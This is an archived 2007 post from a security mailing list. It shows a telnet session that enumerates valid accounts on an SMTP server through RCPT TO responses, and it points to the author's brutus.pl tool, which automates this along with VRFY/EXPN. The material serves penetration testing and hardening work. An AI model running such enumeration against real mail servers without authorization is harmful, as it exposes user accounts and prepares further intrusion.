From: Marco Ivaldi (raptor@mediaservice.net)
Date: Fri May 25 2007 - 06:43:15 EDT
On Thu, 24 May 2007, Clemens, Dan wrote:
> The use of SMTP command may help you - expn or vrfy will help you in
> enumerating accounts.
As a side note, i've seen quite a lot of SMTP servers (Sendmail, Postfix,
Exchange, etc.) configured to leak valid users with the RCPT TO command
too, e.g.:
raptor@pandora:~$ telnet mail 25
Trying x.x.x.x...
Connected to mail.
Escape character is '^]'.
220 mail ESTMP none
helo foo
250 mail
mail from:<test@test.com>
250 Ok
rcpt to:<root>
250 Ok
rcpt to:<noexistant>
550 <noexistant>: Recipient address rejected: User unknown in local
recipient table
Sometimes, such as in this example, system users are leaked; sometimes
only email addresses can be recovered. In some situations, the latter may
be considered "a feature, not a bug" (tm), as for instance it helps to
keep a lower resource usage on servers heavily targeted by spam. YMMV.
My brutus.pl tool implements this information leak attack, together with
the classic VRFY/EXPN (it always amazes me how these are still active on
some default configurations!):
http://www.0xdeadbeef.info/code/brutus.pl
Cheers,
-- Marco Ivaldi, OPST Chief Security Officer Data Security Division @ Mediaservice.net Srl http://mediaservice.net/ ------------------------------------------------------------------------ This List Sponsored by: Cenzic Are you using SPI, Watchfire or WhiteHat? Consider getting clear vision with Cenzic See HOW Now with our 20/20 program! http://www.cenzic.com/c/2020 ------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:50 EDT